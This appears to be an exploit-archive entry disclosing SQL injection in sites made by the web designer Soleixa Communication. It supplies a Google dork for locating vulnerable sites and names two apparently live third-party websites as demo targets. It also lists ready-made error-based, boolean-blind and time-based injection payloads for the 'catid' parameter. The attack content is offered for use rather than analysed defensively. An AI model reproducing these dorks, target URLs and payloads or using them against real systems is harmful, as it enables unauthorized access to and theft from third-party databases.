Soleixa Communication Sql İnjection Vulnerability

2018.05.09
tr TrazeR (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################# # Exploit Title: Soleixa Communication Sql İnjection Vulnerability # Author : TrazeR & AKINCİLAR # Google Dork : intext:"Webdesign : Soleixa Communication." inurl:catid= # Tested on : Kali Linux 2018.1 # Date : 08.05.2018 # Vendor Home: http://www.soleixa-communication.com/ # Blog : https://www.trazer.org/ # Forum : http://www.cyber-warrior.org/ ################################################################################# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] root@TrazeR:~# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Sqlmap Or Manuel [+] GET parameter 'catid' is vulnerable Demo: http://www.acstremy.fr/contenu/index.php?catid= Parameter: catid (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: catid=(SELECT 4284 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4284=4284,1))),0x7176626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Demo 2 : http://www.animalerie-chiots-chatons-aquatiti.com/animalerie/index.php?catid=27 Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catid=27 AND 3838=3838 Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: catid=27 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178767a71,(SELECT (ELT(8814=8814,1))),0x71706a7671,0x78))s), 8446744073709551610, 8446744073709551610))) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: catid=27 AND SLEEP(5) #AKINCILAR ! BU GECE SAYGI DUYUN ! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

https://www.trazer.org/
http://www.cyber-warrior.org/


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top